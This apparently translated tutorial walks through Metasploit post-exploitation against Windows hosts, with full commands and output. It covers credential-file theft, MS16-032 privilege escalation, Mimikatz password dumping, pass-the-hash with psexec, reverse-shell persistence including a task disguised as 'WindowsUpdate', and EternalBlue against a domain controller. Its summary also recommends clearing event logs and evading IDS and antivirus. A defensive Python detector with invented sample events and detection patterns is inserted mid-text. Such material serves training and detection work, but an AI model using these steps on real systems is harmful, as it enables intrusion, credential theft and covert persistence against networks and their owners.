Metasploit Post-Exploitation Modules in Depth: A Practical Guide from Persistence to Lateral Movement
Introduction: The Value and Challenges of the Post-Exploitation Phase
In a penetration test, obtaining an initial shell is only the beginning. What truly tests a security engineer's skill is the ability to control the system during the post-exploitation phase. Metasploit, the most mature open-source penetration framework, ships with post-exploitation modules that cover the full attack chain: information gathering, privilege escalation, credential theft, persistence and lateral movement. Yet many practitioners never get past using exploit/multi/handler to catch a reverse shell and know little about the modules under the post/ directory.

This article takes a hands-on look at the in-depth use of Metasploit's post-exploitation modules, covering advanced Meterpreter features, automated post-exploitation scripts and lateral movement in a domain environment. All operations were performed in an authorized test environment.
Core Content: Post-Exploitation Modules in Practice
I. Establishing a Meterpreter Session and Basic Operations
After obtaining the initial shell, first confirm the state of the Meterpreter session:
msf6 > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows WIN-2K8\Administrator @ WIN-2K8 192.168.1.5:4444 -> 192.168.1.100:49158
After entering the session with sessions -i 1, collect system information:
meterpreter > sysinfo
Computer : WIN-2K8
OS : Windows 2008 R2 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : zh-CN
Meterpreter : x64/windows
meterpreter > getuid
Server username: WIN-2K8\Administrator
II. Information-Gathering Modules in Depth
Metasploit's post/windows/gather/ directory contains a large number of information-gathering modules. The following scenario shows how to automate the discovery of sensitive files:
Scenario: discovering sensitive files on an internal server
# Load the information-gathering module
meterpreter > run post/windows/gather/enum_applications
[*] Enumerating applications installed on WIN-2K8
[*] List of installed applications:
[+] 7-Zip 9.20 (x64 edition)
[+] Microsoft Office Professional Plus 2010
[+] PuTTY 0.70
[+] WinSCP 5.9.4
# PuTTY and WinSCP are installed; they may hold SSH credentials
meterpreter > search -f *.ppk
Found 2 results...
c:\Users\Administrator\.ssh\id_rsa.ppk
c:\Users\Administrator\.ssh\id_rsa.ppk.bak
# Download the private key file
meterpreter > download c:\Users\Administrator\.ssh\id_rsa.ppk /tmp/
[*] downloading: c:\Users\Administrator\.ssh\id_rsa.ppk -> /tmp/id_rsa.ppk
[*] downloaded : c:\Users\Administrator\.ssh\id_rsa.ppk -> /tmp/id_rsa.ppk
III. Privilege Escalation Techniques
1. Detecting local privilege-escalation vulnerabilities
Use the post/multi/recon/local_exploit_suggester module to automatically detect usable privilege-escalation vulnerabilities:
meterpreter > background
[*] Backgrounding session 1...
msf6 > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 192.168.1.100 - Collecting local exploits for x64/windows...
[*] 192.168.1.100 - 38 exploit checks are being tried...
[+] 192.168.1.100 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target appears to be vulnerable.
[+] 192.168.1.100 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
2. Escalating to SYSTEM with MS16-032
msf6 > use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set SESSION 1
SESSION => 1
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set LHOST 192.168.1.5
LHOST => 192.168.1.5
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > run
[*] Started reverse TCP handler on 192.168.1.5:4444
[*] Launching notepad to host the exploit...
[+] Process 2140 launched.
[*] Reflectively injecting the exploit DLL into 2140...
[*] Injecting exploit into 2140 ...
[*] Exploit injected. Injecting payload into 2140...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (201283 bytes) to 192.168.1.100
[*] Meterpreter session 2 opened (192.168.1.5:4444 -> 192.168.1.100:49159)
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
IV. Credential Theft and Pass-the-Hash Attacks
1. Obtaining plaintext credentials with the Kiwi module
Meterpreter's kiwi extension (based on Mimikatz) can extract plaintext passwords from memory:
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
Username Domain NTLM SHA1
-------- ------ ---- ----
Administrator WIN-2K8 aad3b435b51404eeaad3b435b51404ee 31d6cfe0d16ae931b73c59d7e0c089c0
wdigest credentials
===================
Username Domain Password
-------- ------ --------
Administrator WIN-2K8 P@ssw0rd123!
kerberos credentials
====================
Username Domain Password
-------- ------ --------
Administrator WIN-2K8 P@ssw0rd123!
2. Lateral movement by pass-the-hash
Once a domain administrator hash has been obtained, use exploit/windows/smb/psexec to pass the hash:
msf6 > use exploit/windows/smb/psexec
msf6 exploit(windows/smb/psexec) > set RHOSTS 192.168.1.101
RHOSTS => 192.168.1.101
msf6 exploit(windows/smb/psexec) > set SMBUser Administrator
SMBUser => Administrator
msf6 exploit(windows/smb/psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
SMBPass => aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
msf6 exploit(windows/smb/psexec) > set PAYLOAD windows/x64/meterpreter/bind_tcp
PAYLOAD => windows/x64/meterpreter/bind_tcp
msf6 exploit(windows/smb/psexec) > run
[*] 192.168.1.101:445 - Connecting to the target...
[*] 192.168.1.101:445 - Service started successfully...
[*] Started bind TCP handler against 192.168.1.101:4444
[*] Sending stage (201283 bytes) to 192.168.1.101
[*] Meterpreter session 3 opened (192.168.1.5:0 -> 192.168.1.101:4444)
V. Persistence Techniques
1. Establishing a backdoor with the persistence module
meterpreter > run persistence -X -i 10 -p 4444 -r 192.168.1.5
[*] Running Persistence Script
[*] Resource file for cleanup: /root/.msf4/logs/persistence/WIN-2K8_20191215.2252/WIN-2K8_20191215.2252.rc
[*] Creating Payload=windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444
[*] Persistent agent script is 79077 bytes long
[+] Persistent Script written to C:\Windows\TEMP\VYVvF.vbs
[*] Executing script C:\Windows\TEMP\VYVvF.vbs
[+] Service WZCSVC installed as Auto-start
[*] Starting service...
[+] Service WZCSVC successfully started
2. Scheduled-task persistence with the schtaskabuse module
A stealthier approach is to abuse Windows scheduled tasks:
msf6 > use post/windows/manage/schtaskabuse
msf6 post(windows/manage/schtaskabuse) > set SESSION 1
SESSION => 1
msf6 post(windows/manage/schtaskabuse) > set TASKNAME "WindowsUpdate"
TASKNAME => WindowsUpdate
msf6 post(windows/manage/schtaskabuse) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf6 post(windows/manage/schtaskabuse) > set LHOST 192.168.1.5
LHOST => 192.168.1.5
msf6 post(windows/manage/schtaskabuse) > run
[*] Creating task: WindowsUpdate
[*] Task created successfully
[*] Task will trigger every 30 minutes
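The psexec pass-the-hash in section IV, the two persistence techniques above and the clearev command mentioned in the summary each leave a distinctive trace in the Windows Security and System logs (4624, 7045, 4698 and 1102). The following Python detector is an added example, not part of the original post or of Metasploit: the event records are constructed sample data (the service name kXwQzLpT, the encoded PowerShell task command and the host FS01 are invented), and the pass-the-hash rule assumes only that an NTLM network logon with key length 0 is followed within 30 seconds by a service install on the same host.

```python
import re
from datetime import datetime, timedelta

# Constructed sample events (not real logs); each dict holds a few fields of one Windows event.
EVENTS = [
    {"ts": "2019-12-15 22:50:01", "id": 4624, "host": "FS01", "user": "Administrator",
     "logon_type": 3, "auth_pkg": "NTLM", "key_len": 0},
    {"ts": "2019-12-15 22:50:03", "id": 7045, "host": "FS01",
     "service": "kXwQzLpT", "image": "%SYSTEMROOT%\\kXwQzLpT.exe"},
    {"ts": "2019-12-15 22:52:10", "id": 7045, "host": "WIN-2K8",
     "service": "WZCSVC", "image": "C:\\Windows\\TEMP\\VYVvF.vbs"},
    {"ts": "2019-12-15 22:55:40", "id": 4698, "host": "WIN-2K8",
     "task": "\\WindowsUpdate", "command": "powershell.exe -nop -w hidden -e SQBFAFgA"},
    {"ts": "2019-12-15 23:01:00", "id": 1102, "host": "WIN-2K8", "user": "SYSTEM"},
    {"ts": "2019-12-15 09:00:00", "id": 4624, "host": "FS01", "user": "jdoe",
     "logon_type": 3, "auth_pkg": "Kerberos", "key_len": 128},
]

# Image paths and commands that legitimate services and tasks rarely use.
SUSPICIOUS = re.compile(r"\\temp\\|\\users\\public\\|\.vbs$|wscript|cscript|powershell.* -e\b", re.I)

def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")

def detect(events, window=timedelta(seconds=30)):
    """Return (rule, host, timestamp) findings in event order."""
    evs = sorted(events, key=lambda e: parse_ts(e["ts"]))
    findings = []
    for i, e in enumerate(evs):
        if e["id"] == 4624 and e["logon_type"] == 3 and e["auth_pkg"] == "NTLM" and e["key_len"] == 0:
            # NTLM network logon with no session key, then a service install (7045) on the
            # same host moments later: the footprint psexec-style pass-the-hash typically leaves.
            for later in evs[i + 1:]:
                if parse_ts(later["ts"]) - parse_ts(e["ts"]) > window:
                    break
                if later["id"] == 7045 and later["host"] == e["host"]:
                    findings.append(("pth_psexec", e["host"], later["ts"]))
        elif e["id"] == 7045 and SUSPICIOUS.search(e["image"]):
            # Auto-start service whose binary is a script in TEMP (the persistence module pattern).
            findings.append(("service_persistence", e["host"], e["ts"]))
        elif e["id"] == 4698 and SUSPICIOUS.search(e["command"]):
            # Scheduled task created to run an encoded PowerShell command (schtaskabuse pattern).
            findings.append(("schtask_persistence", e["host"], e["ts"]))
        elif e["id"] == 1102:  # Security audit log cleared: what clearev leaves behind
            findings.append(("audit_log_cleared", e["host"], e["ts"]))
    return findings

if __name__ == "__main__":
    for rule, host, ts in detect(EVENTS):
        print(f"{ts}  {host:8}  {rule}")
```

The psexec-installed service itself looks ordinary, so it is caught only by the correlation with the preceding NTLM logon; the other three rules fire on a single event.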
VI. Internal Lateral Movement in Practice
Scenario: from a single foothold to control of the domain controller
Assume we already hold a domain member host and reconnaissance has shown the domain controller to be at 192.168.1.10:
# Load the enumeration module in the existing session
meterpreter > run post/windows/gather/enum_domain
[*] Domain: CORP
[*] Domain Controller: DC01 (192.168.1.10)
[*] Current Domain Controller: DC01.corp.local
# Scan the domain controller with an auxiliary scanner module
msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.1.10
RHOSTS => 192.168.1.10
msf6 auxiliary(scanner/smb/smb_version) > run
[*] 192.168.1.10:445 - SMB Detected (versions: 2, 3) (preferred dialect:SMB 3.0.0) (compression capabilities: 1) (encryption capabilities: 1) (signatures: 2) (OS: Windows Server 2012 R2 6.3) (domain: CORP)
# Attempt to gain control of the domain controller with EternalBlue
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.1.10
RHOSTS => 192.168.1.10
msf6 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.1.5
LHOST => 192.168.1.5
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 192.168.1.5:4444
[*] 192.168.1.10:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.1.10:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2012 R2 6.3 x64 (64-bit)
[*] 192.168.1.10:445 - Selecting PowerShell target
[*] 192.168.1.10:445 - Executing automatic exploit (no AutoCheckMode)
[+] 192.168.1.10:445 - SMB ETERNALBLUE Windows 8.1/Server 2012 R2 x64 success!
[*] Sending stage (201283 bytes) to 192.168.1.10
[*] Meterpreter session 4 opened (192.168.1.5:4444 -> 192.168.1.10:49160)
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Summary: Notes and Best Practices for Post-Exploitation Modules
Security notes
- Log cleanup: the clearev command clears the event logs, but be aware that this may alert administrators
- Traffic encryption: enable Meterpreter's SSL-encrypted transport to avoid IDS/IPS detection
- Process migration: use the migrate command to move into a legitimate system process (such as explorer.exe or svchost.exe)
- Avoid destructive operations: use commands such as reboot and shutdown with care in production environments
Best-practice recommendations
- Combine modules: chain the information-gathering, privilege-escalation and credential-theft modules into a complete attack chain
- Automate with resource files: write an MSF resource file (.rc) to automate post-exploitation:
# post_exploit.rc
# Start the handler as a background job (-j) without interacting with new sessions (-z)
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.5
set LPORT 4444
set ExitOnSession false
exploit -j -z
# The post modules below assume session 1 has already called back to the handler
use post/windows/gather/enum_domain
set SESSION 1
run
use post/windows/gather/enum_applications
set SESSION 1
run
use post/multi/recon/local_exploit_suggester
set SESSION 1
run
- Keep modules up to date: update the Metasploit framework regularly (msfupdate) to obtain the latest exploit modules
- Custom payloads: use msfvenom to generate AV-evading payloads for use alongside the post-exploitation modules
- Work in stages: gather information first, then escalate privileges, and only then move laterally, to avoid exposing yourself too early
The post-exploitation phase is the part of a penetration test that most clearly shows technical skill. Mastering Metasploit's post-exploitation modules requires not only familiarity with each module's functions and parameters but also an understanding of the underlying mechanisms of Windows and Linux. In real engagements, combine the modules above flexibly according to the characteristics of the environment, and keep thorough records of your actions and of your clean-up. For defenders, understanding these attack techniques is just as important: only by knowing the attacker's methods can you build more effective detection and defenses.
